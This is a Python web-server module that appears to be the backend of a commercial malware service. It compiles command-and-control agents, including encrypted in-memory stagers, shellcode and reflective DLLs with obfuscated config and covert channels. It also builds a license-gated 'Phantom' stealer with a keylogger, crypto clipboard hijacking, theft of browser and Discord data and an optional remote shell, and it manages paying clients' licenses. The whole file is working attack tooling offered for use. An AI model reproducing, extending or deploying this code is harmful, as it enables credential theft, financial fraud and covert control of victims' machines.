"""
POST /api/build   — C2 agent builder (admin only)
POST /api/phantom — Phantom stealer builder (license-gated)

output = "standalone" → agent.exe  (direct beacon, no stager)
output = "stager"     → stager.exe (downloads + in-memory loads agent.exe)
                        also registers the encrypted stage at /api/stage/<token>
"""
from __future__ import annotations
import asyncio
import base64
import datetime as _dt
import os
import re
import shutil
import sys
import secrets
import subprocess
import tempfile
import uuid
from datetime import datetime, timezone
from typing import Optional

from fastapi import APIRouter, BackgroundTasks, Depends, HTTPException
from fastapi.responses import FileResponse, Response
from pydantic import BaseModel
from sqlalchemy.orm import Session

import database
from models.license import License
from routers.auth import verify_admin, verify_phantom_access

router = APIRouter(tags=["build"])

_build_lock   = asyncio.Lock()
_phantom_lock = asyncio.Lock()

# XOR key — must match agent/tools/obfuscate.py and gen_stager_config.py
_XOR_KEY     = b"\x7a\x3f\x91\xc4\x52\x88\xb1\xde\xad\xbe\xef\x13\x37\xca\xfe\x42"
_XOR_KEY_LEN = len(_XOR_KEY)

_SERVER_DIR       = os.path.dirname(os.path.dirname(__file__))
_AGENT_DIR        = os.path.normpath(os.path.join(_SERVER_DIR, "..", "agent"))
_PHANTOM_AGENT_DIR = os.environ.get(
    "PHANTOM_AGENT_DIR",
    r"C:\Users\zak28\OneDrive\Bureau\CETP\Malware Development\01_Projects\PhantomStealer",
)
_MAKE_EXE    = "C:/msys64/usr/bin/make.exe"
_PYTHON_EXE  = sys.executable
_AGENT_EXE   = os.path.join(_AGENT_DIR, "agent.exe")
_STAGER_EXE  = os.path.join(_AGENT_DIR, "stager.exe")
_CONFIG_H    = os.path.join(_AGENT_DIR, "include", "agent_config.h")


class BuildRequest(BaseModel):
    output:             str = "standalone"  # standalone | stager
    channel:            str = "http"        # http | github | doh
    beacon_url:         str = ""
    stage_server_url:   str = ""            # base URL for stager stage download (stager only)
    beacon_interval:    int = 30000
    jitter_pct:         int = 40
    kill_date:          str = ""
    github_token:       str = ""
    gist_cmd:           str = ""
    gist_out:           str = ""
    doh_domain:         str = ""
    teams_tenant:       str = ""
    teams_client:       str = ""
    teams_secret:       str = ""
    teams_webhook:      str = ""
    teams_team_id:      str = ""
    teams_channel:      str = ""
    http_useragent:     str = ""            # custom UA; empty = random rotation
    http_extra_headers: str = ""            # extra HTTP headers, newline-delimited
    http_cert_pin:      str = ""            # SHA-256 hex fingerprint of server leaf cert


# ---- XOR / header generation helpers ----

def _xor_encode(data: bytes) -> list[int]:
    return [b ^ _XOR_KEY[i % _XOR_KEY_LEN] for i, b in enumerate(data)]


def _emit(name: str, value: str) -> str:
    if not value:
        return (
            f"/* {name}: not configured */\n"
            f"static const unsigned char CFG_{name}[] = {{0x00}};\n"
            f"#define CFG_{name}_LEN 0\n\n"
        )
    enc     = _xor_encode(value.encode())
    arr     = ", ".join(f"0x{b:02x}" for b in enc)
    preview = value[:32] + ("…" if len(value) > 32 else "")
    return (
        f"/* {name} — XOR-encoded ({len(enc)} bytes) */\n"
        f"/* plaintext preview: {preview!r} */\n"
        f"static const unsigned char CFG_{name}[] = {{{arr}, 0x00}};\n"
        f"#define CFG_{name}_LEN {len(enc)}\n\n"
    )


def _generate_agent_config_h(req: BuildRequest) -> str:
    kill_ts = "0"
    if req.kill_date:
        try:
            dt      = datetime.strptime(req.kill_date, "%Y-%m-%d").replace(tzinfo=timezone.utc)
            kill_ts = str(int(dt.timestamp()))
        except ValueError:
            pass

    key_hex = ", ".join(f"0x{b:02x}" for b in _XOR_KEY)
    h = (
        "/* AUTO-GENERATED by LegitC2 payload builder — do not edit manually. */\n"
        "#ifndef AGENT_CONFIG_H\n"
        "#define AGENT_CONFIG_H\n\n"
        f"#define CFG_XOR_KEY_LEN {_XOR_KEY_LEN}\n"
        f"static const unsigned char CFG_XOR_KEY[{_XOR_KEY_LEN}] = {{ {key_hex} }};\n\n"
    )
    # Normalise extra headers: convert bare \n to \r\n for WinHTTP
    extra_hdrs = req.http_extra_headers.replace("\r\n", "\n").replace("\n", "\r\n")
    if extra_hdrs and not extra_hdrs.endswith("\r\n"):
        extra_hdrs += "\r\n"

    values: dict[str, str] = {
        "GITHUB_TOKEN":       req.github_token if req.channel == "github" else "",
        "GIST_CMD_ID":        req.gist_cmd     if req.channel == "github" else "",
        "GIST_OUT_ID":        req.gist_out     if req.channel == "github" else "",
        "TEAMS_TENANT":       req.teams_tenant  if req.channel == "teams" else "",
        "TEAMS_CLIENT":       req.teams_client  if req.channel == "teams" else "",
        "TEAMS_SECRET":       req.teams_secret  if req.channel == "teams" else "",
        "TEAMS_WEBHOOK":      req.teams_webhook if req.channel == "teams" else "",
        "TEAMS_TEAM_ID":      req.teams_team_id if req.channel == "teams" else "",
        "TEAMS_CHANNEL":      req.teams_channel if req.channel == "teams" else "",
        "BEACON_URL":         req.beacon_url   if req.channel == "http"   else "",
        "DOH_DOMAIN":         req.doh_domain   if req.channel == "doh"    else "",
        "KILL_DATE":          kill_ts,
        "HTTP_USERAGENT":     req.http_useragent,
        "HTTP_EXTRA_HEADERS": extra_hdrs if req.channel == "http" else "",
        "CERT_PIN":           req.http_cert_pin.strip().lower() if req.channel == "http" else "",
    }
    for name, value in values.items():
        h += _emit(name, value)
    h += "#endif /* AGENT_CONFIG_H */\n"
    return h


# ---- Make helpers ----

def _make(target: str, timeout: int = 120, env: dict | None = None) -> subprocess.CompletedProcess:
    return subprocess.run(
        [_MAKE_EXE, "-C", _AGENT_DIR, target],
        capture_output=True, text=True, timeout=timeout,
        env={**os.environ, **(env or {})},
    )


# ---- ChaCha20-Poly1305 (Python, for encrypting the stage on the server) ----

def _encrypt_stage(pe_bytes: bytes) -> tuple[bytes, str]:
    """Encrypt agent.exe with a fresh random key. Returns (blob, key_hex)."""
    from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305
    key   = secrets.token_bytes(32)
    nonce = secrets.token_bytes(12)
    aead  = ChaCha20Poly1305(key)
    ct    = aead.encrypt(nonce, pe_bytes, None)   # ct includes tag
    blob  = nonce + ct                            # nonce(12) | ciphertext | tag(16)
    return blob, key.hex()


# ---- Endpoint ----

@router.post("/build")
async def build_payload(req: BuildRequest, _: str = Depends(verify_admin)):
    if _build_lock.locked():
        raise HTTPException(503, "Build already in progress — try again in a moment")

    async with _build_lock:
        # Step 1: write agent_config.h + compile agent.exe
        try:
            with open(_CONFIG_H, "w", encoding="utf-8") as f:
                f.write(_generate_agent_config_h(req))
        except OSError as e:
            raise HTTPException(500, f"Config write failed: {e}")

        try:
            r_cfg = _make("config")
        except FileNotFoundError:
            raise HTTPException(500, "make not found — MSYS2 required at C:/msys64")
        if r_cfg.returncode != 0:
            raise HTTPException(500, f"Config gen failed:\n{(r_cfg.stderr or r_cfg.stdout)[-1000:]}")

        try:
            r = _make("build-only")
        except FileNotFoundError:
            raise HTTPException(500, "make not found — MSYS2 required at C:/msys64")
        except subprocess.TimeoutExpired:
            raise HTTPException(500, "Agent compile timed out")

        if r.returncode != 0:
            raise HTTPException(500, f"Agent compile failed:\n{(r.stderr or r.stdout)[-2000:]}")
        if not os.path.exists(_AGENT_EXE):
            raise HTTPException(500, "agent.exe not found after build")

        # --- Shellcode: convert agent.exe → agent.bin via donut ---
        if req.output == "shellcode":
            sc_path = os.path.join(_AGENT_DIR, "agent.bin")
            pe2sc   = os.path.join(_AGENT_DIR, "tools", "pe2sc.py")
            try:
                r_sc = subprocess.run(
                    [_PYTHON_EXE, pe2sc, _AGENT_EXE, sc_path],
                    capture_output=True, text=True, timeout=120,
                )
            except subprocess.TimeoutExpired:
                raise HTTPException(500, "Shellcode conversion timed out")
            if r_sc.returncode != 0:
                detail = (r_sc.stderr or r_sc.stdout or "unknown error")[-2000:]
                raise HTTPException(500, f"Shellcode conversion failed:\n{detail}\n\nTip: pip install donut-shellcode")
            if not os.path.exists(sc_path):
                raise HTTPException(500, "agent.bin not found after shellcode conversion")
            return FileResponse(
                sc_path,
                media_type="application/octet-stream",
                filename="agent.bin",
                headers={"Content-Disposition": 'attachment; filename="agent.bin"'},
            )

        # --- Reflective DLL: compile agent.dll with custom ReflectiveLoader ---
        if req.output == "reflective_dll":
            dll_path = os.path.join(_AGENT_DIR, "agent.dll")
            try:
                r_dll = subprocess.run(
                    [_MAKE_EXE, "-C", _AGENT_DIR, "reflective-dll-only"],
                    capture_output=True, text=True, timeout=120,
                )
            except subprocess.TimeoutExpired:
                raise HTTPException(500, "Reflective DLL compile timed out")
            if r_dll.returncode != 0:
                detail = (r_dll.stderr or r_dll.stdout or "unknown error")[-2000:]
                raise HTTPException(500, f"Reflective DLL compile failed:\n{detail}")
            if not os.path.exists(dll_path):
                raise HTTPException(500, "agent.dll not found after build")
            return FileResponse(
                dll_path,
                media_type="application/octet-stream",
                filename="agent.dll",
                headers={"Content-Disposition": 'attachment; filename="agent.dll"'},
            )

        # --- Standalone: return agent.exe directly ---
        if req.output != "stager":
            return FileResponse(
                _AGENT_EXE,
                media_type="application/octet-stream",
                filename="agent.exe",
                headers={"Content-Disposition": 'attachment; filename="agent.exe"'},
            )

        # --- Stager: encrypt agent.exe, build stager.exe ---
        with open(_AGENT_EXE, "rb") as f:
            pe_bytes = f.read()

        blob, key_hex = _encrypt_stage(pe_bytes)

        # Generate single-use download token + register stage
        token = secrets.token_hex(32)
        base  = req.stage_server_url.rstrip("/") or "http://127.0.0.1:8000"
        stage_url = f"{base}/api/stage/{token}"

        # Generate stager_config.h
        gen_script = os.path.join(_AGENT_DIR, "tools", "gen_stager_config.py")
        try:
            r2 = subprocess.run(
                [_PYTHON_EXE, gen_script, "--url", stage_url, "--key", key_hex],
                capture_output=True, text=True, timeout=15,
            )
        except Exception as e:
            raise HTTPException(500, f"gen_stager_config failed: {e}")
        if r2.returncode != 0:
            raise HTTPException(500, f"gen_stager_config error:\n{r2.stderr}")

        # Compile stager
        try:
            r3 = _make("stager-only")
        except subprocess.TimeoutExpired:
            raise HTTPException(500, "Stager compile timed out")

        if r3.returncode != 0:
            raise HTTPException(500, f"Stager compile failed:\n{(r3.stderr or r3.stdout)[-2000:]}")
        if not os.path.exists(_STAGER_EXE):
            raise HTTPException(500, "stager.exe not found after build")

        # Register encrypted stage so GET /api/stage/<token> can serve it
        from routers.stage import register_stage
        register_stage(token, blob)

        return FileResponse(
            _STAGER_EXE,
            media_type="application/octet-stream",
            filename="stager.exe",
            headers={"Content-Disposition": 'attachment; filename="stager.exe"'},
        )


# ── Phantom stealer builder ────────────────────────────────────────────────

# Output base dir — outside OneDrive so AV/OneDrive can't quarantine builds.
# Each build gets its own subdirectory (temp), deleted after streaming.
_PHANTOM_BUILD_BASE = os.environ.get("PHANTOM_BUILD_BASE", "C:/Dev/phantom_build")
_PHANTOM_CONFIG     = os.path.join(_PHANTOM_AGENT_DIR, "include", "phantom_config.h")
_PHANTOM_CERT_H     = os.path.join(_PHANTOM_AGENT_DIR, "include", "client_cert_pfx.h")

# Env vars that must NEVER be inherited by the make subprocess.
# PHANTOM_DEBUG would compile debug logging (writes plaintext to C:/Windows/Temp).
_ENV_STRIP = frozenset({
    "PHANTOM_DEBUG", "PHANTOM_DEBUG_LOG", "PHANTOM_DEBUG_C2",
})

_FEATURE_FLAG_MAP = {
    "keylogger":  "-DHAVE_KEYLOGGER",
    "clipjack":   "-DHAVE_CLIPJACK",
    "screenshot": "-DHAVE_SCREENSHOT",
    "browser":    "-DHAVE_BROWSER",
    "crypto":     "-DHAVE_CRYPTO",
    "discord":    "-DHAVE_DISCORD",
    "clipboard":  "-DHAVE_CLIPBOARD",
    "shell":      "-DHAVE_SHELL",
}

# C2 endpoint is server-controlled — clients never choose where data goes.
_PHANTOM_C2_HOST = os.environ.get("PHANTOM_C2_HOST", "127.0.0.1")
_PHANTOM_C2_PORT = int(os.environ.get("PHANTOM_C2_PORT", "8443"))


class PhantomFeatures(BaseModel):
    keylogger:  bool = True
    clipjack:   bool = True
    screenshot: bool = True
    browser:    bool = True
    crypto:     bool = True
    discord:    bool = True
    clipboard:  bool = True
    shell:      bool = False


class PhantomBuildRequest(BaseModel):
    license_key: str = ""   # required for admins; ignored for clients (key is bound to account)
    poll_ms:     int = 30000
    jitter_pct:  int = 20
    features:    PhantomFeatures = PhantomFeatures()
    format:      str = "pe"   # pe | bin


def _bytes_to_c_array(name: str, data: bytes) -> bytes:
    out = [f"/* auto-generated */\nstatic const unsigned char {name}[] = {{\n".encode()]
    for i, b in enumerate(data):
        if i % 16 == 0:
            out.append(b"  ")
        out.append(f"0x{b:02x}, ".encode())
        if i % 16 == 15:
            out.append(b"\n")
    if len(data) % 16 != 0:
        out.append(b"\n")
    out.append(f"}};\nstatic const unsigned int {name}_LEN = {len(data)};\n".encode())
    return b"".join(out)


def _gen_client_cert(license_key: str, ca_cert_pem: str, ca_key_pem: str) -> bytes:
    """Generate a per-license mTLS client cert signed by the operator CA. Returns PFX bytes."""
    from cryptography import x509
    from cryptography.x509.oid import NameOID
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import rsa
    from cryptography.hazmat.primitives.serialization import pkcs12

    ca_cert = x509.load_pem_x509_certificate(ca_cert_pem.encode())
    ca_key  = serialization.load_pem_private_key(ca_key_pem.encode(), password=None)
    client_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

    now  = _dt.datetime.now(_dt.timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, license_key)]))
        .issuer_name(ca_cert.subject)
        .public_key(client_key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now)
        .not_valid_after(now + _dt.timedelta(days=3650))
        .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
        .sign(ca_key, hashes.SHA256())
    )
    return pkcs12.serialize_key_and_certificates(
        name=license_key.encode(),
        key=client_key,
        cert=cert,
        cas=None,
        encryption_algorithm=serialization.NoEncryption(),
    )


def _embed_client_cert(pfx_bytes: bytes, build_dir: str) -> None:
    """Write client_cert_pfx.h from PFX bytes via bin2h.py."""
    pfx_tmp = os.path.join(build_dir, "client.pfx")
    with open(pfx_tmp, "wb") as f:
        f.write(pfx_bytes)

    bin2h = os.path.join(_PHANTOM_AGENT_DIR, "tools", "bin2h.py")
    r = subprocess.run(
        [_PYTHON_EXE, bin2h, pfx_tmp, "CLIENT_CERT_PFX"],
        capture_output=True, timeout=15,
    )
    if r.returncode != 0:
        raise RuntimeError(f"bin2h failed: {r.stderr.decode()[:200]}")

    # bin2h emits `_len` but the agent expects `_LEN`
    header = r.stdout.replace(b"_len = ", b"_LEN = ")
    with open(_PHANTOM_CERT_H, "wb") as f:
        f.write(header)


def _embed_ca_der_h(ca_cert_pem: str) -> None:
    """Write operator_ca_der.h from CA PEM — embedded in agent to verify server TLS cert."""
    from cryptography import x509
    from cryptography.hazmat.primitives import serialization
    cert = x509.load_pem_x509_certificate(ca_cert_pem.encode())
    der  = cert.public_bytes(serialization.Encoding.DER)
    h_path = os.path.join(_PHANTOM_AGENT_DIR, "include", "operator_ca_der.h")
    with open(h_path, "wb") as f:
        f.write(_bytes_to_c_array("OPERATOR_CA_DER", der))


def _validate_phantom_req(req: PhantomBuildRequest) -> None:
    if not (5000 <= req.poll_ms <= 600_000):
        raise HTTPException(400, "poll_ms must be 5000–600000")
    if not (0 <= req.jitter_pct <= 60):
        raise HTTPException(400, "jitter_pct must be 0–60")
    if req.format not in ("pe", "bin"):
        raise HTTPException(400, "format must be 'pe' or 'bin'")


def _build_feat_flags(features: PhantomFeatures) -> str:
    return " ".join(
        flag for name, flag in _FEATURE_FLAG_MAP.items()
        if getattr(features, name)
    )


def _clean_env(extra: dict) -> dict:
    env = {k: v for k, v in os.environ.items() if k not in _ENV_STRIP}
    env.update(extra)
    return env


def _write_phantom_config(req: PhantomBuildRequest) -> None:
    content = (
        "#ifndef PHANTOM_CONFIG_H\n"
        "#define PHANTOM_CONFIG_H\n\n"
        f'#define C2_HOST  "{_PHANTOM_C2_HOST}"\n'
        f"#define C2_PORT   {_PHANTOM_C2_PORT}\n"
        f"#define C2_POLL_MS {req.poll_ms}\n"
        f"#define JITTER_PCT {req.jitter_pct}\n\n"
        "#endif /* PHANTOM_CONFIG_H */\n"
    )
    with open(_PHANTOM_CONFIG, "w", encoding="utf-8") as f:
        f.write(content)


def _make_phantom(feat_flags: str, watermark: str,
                  build_dir: str, timeout: int = 180) -> subprocess.CompletedProcess:
    gen_evs = os.path.join(_PHANTOM_AGENT_DIR, "tools", "gen_evs_strings.py")
    r_evs = subprocess.run(
        [_PYTHON_EXE, gen_evs],
        capture_output=True, text=True, timeout=30,
        cwd=_PHANTOM_AGENT_DIR,
    )
    if r_evs.returncode != 0:
        raise RuntimeError("EVS generation failed")

    enc_blob = os.path.join(_PHANTOM_AGENT_DIR, "tools", "encrypt_blob.py")
    r_blob = subprocess.run(
        [_PYTHON_EXE, enc_blob],
        capture_output=True, text=True, timeout=30,
        cwd=_PHANTOM_AGENT_DIR,
    )
    if r_blob.returncode != 0:
        raise RuntimeError(f"Blob re-encode failed: {r_blob.stderr}")

    build_dir_fwd = build_dir.replace("\\", "/")
    # Prepend MSYS2 paths so make can find bash (needed for _LD_ENV TMP='' prefix syntax),
    # mingw64 toolchain (g++, strip, objcopy), and python3.
    _msys2_paths = [
        "C:/msys64/usr/bin",
        "C:/msys64/mingw64/bin",
    ]
    env = _clean_env({
        "PHANTOM_FEAT_FLAGS": feat_flags,
        "PHANTOM_WATERMARK":  watermark,
        "PHANTOM_OUT":        build_dir_fwd,
        "PATH": ";".join(_msys2_paths) + ";" + os.environ.get("PATH", ""),
        "MSYSTEM": "MINGW64",
    })
    return subprocess.run(
        [_MAKE_EXE, "-C", _PHANTOM_AGENT_DIR, "phantom-c2-build-only"],
        capture_output=True, text=True, timeout=timeout, env=env,
    )


@router.post("/phantom")
async def build_phantom(
    req: PhantomBuildRequest,
    background_tasks: BackgroundTasks,
    caller: dict = Depends(verify_phantom_access),
    db: Session = Depends(database.get_db),
):
    _validate_phantom_req(req)

    # Clients: license key is bound to their account — body value is ignored.
    # Admins:  license key comes from request body.
    if caller["role"] == "client":
        lic_key = caller["license_key"]
    else:
        lic_key = req.license_key.strip().upper()
        if not lic_key:
            raise HTTPException(400, "license_key is required")

    lic = db.get(License, lic_key)
    if not lic:
        raise HTTPException(403, "Invalid license key")
    ok, reason = lic.is_valid()
    if not ok:
        raise HTTPException(403, f"License rejected: {reason}")

    if _phantom_lock.locked():
        raise HTTPException(503, "Build already in progress — retry shortly")

    async with _phantom_lock:
        build_uuid = str(uuid.uuid4())
        watermark  = f'-DBUILD_UUID=\\"{build_uuid}\\"'
        feat_flags = _build_feat_flags(req.features)

        # Per-build isolated output directory — deleted after the response is sent.
        os.makedirs(_PHANTOM_BUILD_BASE, exist_ok=True)
        build_dir = tempfile.mkdtemp(prefix="ph_", dir=_PHANTOM_BUILD_BASE)

        try:
            _write_phantom_config(req)
        except OSError:
            shutil.rmtree(build_dir, ignore_errors=True)
            raise HTTPException(500, "Config write failed")

        from services.ca import get_or_create as _get_ca
        ca = _get_ca(db)

        # Embed CA DER so agent can verify server TLS cert
        try:
            _embed_ca_der_h(ca.ca_cert_pem)
        except Exception as e:
            shutil.rmtree(build_dir, ignore_errors=True)
            raise HTTPException(500, f"CA embed failed: {e}")

        # Embed per-license client cert (generate on-the-fly if missing)
        if not lic.cert_pfx_b64:
            try:
                pfx = _gen_client_cert(lic.key, ca.ca_cert_pem, ca.ca_key_pem)
                lic.cert_pfx_b64 = base64.b64encode(pfx).decode()
                db.commit()
            except Exception as e:
                shutil.rmtree(build_dir, ignore_errors=True)
                raise HTTPException(500, f"Client cert generation failed: {e}")
        try:
            _embed_client_cert(base64.b64decode(lic.cert_pfx_b64), build_dir)
        except Exception as e:
            shutil.rmtree(build_dir, ignore_errors=True)
            raise HTTPException(500, f"Cert embed failed: {e}")

        try:
            r = _make_phantom(feat_flags, watermark, build_dir)
        except FileNotFoundError:
            shutil.rmtree(build_dir, ignore_errors=True)
            raise HTTPException(500, "make not found — MSYS2 required at C:/msys64")
        except subprocess.TimeoutExpired:
            shutil.rmtree(build_dir, ignore_errors=True)
            raise HTTPException(500, "Compile timed out")
        except RuntimeError as e:
            shutil.rmtree(build_dir, ignore_errors=True)
            raise HTTPException(500, str(e))

        if r.returncode != 0:
            shutil.rmtree(build_dir, ignore_errors=True)
            # Strip server paths from compiler output before exposing to client.
            stderr = re.sub(r'[A-Za-z]:[/\\][^\s\n]{0,120}', '[path]',
                            (r.stderr or r.stdout)[-2000:])
            raise HTTPException(500, f"Compile failed:\n{stderr}")

        out_exe = os.path.join(build_dir, "phantom.exe")
        if not os.path.exists(out_exe):
            shutil.rmtree(build_dir, ignore_errors=True)
            raise HTTPException(500, "phantom.exe not found after build")

        # Update audit trail before streaming.
        lic.build_count    += 1
        lic.last_build_uuid = build_uuid
        lic.last_build_at   = datetime.utcnow()
        lic.last_feat_flags = feat_flags
        lic.last_built_by   = caller["username"]
        db.commit()

        if req.format == "bin":
            sc_path = os.path.join(build_dir, "phantom.bin")
            pe2sc   = os.path.join(_PHANTOM_AGENT_DIR, "tools", "pe2sc.py")
            try:
                r_sc = subprocess.run(
                    [_PYTHON_EXE, pe2sc, out_exe, sc_path],
                    capture_output=True, text=True, timeout=120,
                    env=_clean_env({}),
                )
            except subprocess.TimeoutExpired:
                shutil.rmtree(build_dir, ignore_errors=True)
                raise HTTPException(500, "Shellcode conversion timed out")
            if r_sc.returncode != 0:
                shutil.rmtree(build_dir, ignore_errors=True)
                raise HTTPException(500, "Shellcode conversion failed")
            if not os.path.exists(sc_path):
                shutil.rmtree(build_dir, ignore_errors=True)
                raise HTTPException(500, "phantom.bin not found after conversion")
            # Schedule cleanup — fires after response body is fully sent.
            background_tasks.add_task(shutil.rmtree, build_dir, True)
            return FileResponse(
                sc_path,
                media_type="application/octet-stream",
                filename="phantom.bin",
                headers={"Content-Disposition": 'attachment; filename="phantom.bin"',
                         "X-Build-UUID": build_uuid},
            )

        background_tasks.add_task(shutil.rmtree, build_dir, True)
        return FileResponse(
            out_exe,
            media_type="application/octet-stream",
            filename="phantom.exe",
            headers={"Content-Disposition": 'attachment; filename="phantom.exe"',
                     "X-Build-UUID": build_uuid},
        )


# ── License management (admin) ────────────────────────────────────────────────

class LicenseCreateRequest(BaseModel):
    label:      str          = ""
    max_builds: Optional[int] = None
    expires_at: Optional[str] = None   # ISO-8601 or None


@router.post("/phantom/licenses", status_code=201)
async def create_license(
    body: LicenseCreateRequest,
    _: str = Depends(verify_admin),
    db: Session = Depends(database.get_db),
):
    key = License.generate()
    exp = None
    if body.expires_at:
        try:
            exp = datetime.fromisoformat(body.expires_at)
        except ValueError:
            raise HTTPException(400, "expires_at must be ISO-8601 (e.g. 2026-12-31T00:00:00)")

    from services.ca import get_or_create as _get_ca
    ca = _get_ca(db)
    try:
        pfx = _gen_client_cert(key, ca.ca_cert_pem, ca.ca_key_pem)
        cert_pfx_b64 = base64.b64encode(pfx).decode()
    except Exception:
        cert_pfx_b64 = None

    lic = License(key=key, label=body.label, max_builds=body.max_builds,
                  expires_at=exp, cert_pfx_b64=cert_pfx_b64)
    db.add(lic)
    db.commit()
    return _lic_dict(lic)


@router.get("/phantom/licenses/me")
async def my_license(
    caller: dict = Depends(verify_phantom_access),
    db: Session = Depends(database.get_db),
):
    if caller["role"] != "client":
        raise HTTPException(403, "Clients only — admins use GET /phantom/licenses")
    lic = db.get(License, caller["license_key"])
    if not lic:
        raise HTTPException(404, "License not found")
    return _lic_dict(lic)


@router.get("/phantom/licenses")
async def list_licenses(
    _: str = Depends(verify_admin),
    db: Session = Depends(database.get_db),
):
    return [_lic_dict(l) for l in db.query(License).order_by(License.created_at.desc()).all()]


@router.delete("/phantom/licenses/{key}", status_code=204)
async def revoke_license(
    key: str,
    _: str = Depends(verify_admin),
    db: Session = Depends(database.get_db),
):
    lic = db.get(License, key.strip().upper())
    if not lic:
        raise HTTPException(404, "License not found")
    lic.is_active = False
    db.commit()


def _lic_dict(lic: License) -> dict:
    return {
        "key":           lic.key,
        "label":         lic.label,
        "is_active":     lic.is_active,
        "build_count":   lic.build_count,
        "max_builds":    lic.max_builds,
        "created_at":    lic.created_at.isoformat()    if lic.created_at    else None,
        "expires_at":    lic.expires_at.isoformat()    if lic.expires_at    else None,
        "last_built_by": lic.last_built_by,
        "last_build_at": lic.last_build_at.isoformat() if lic.last_build_at else None,
    }
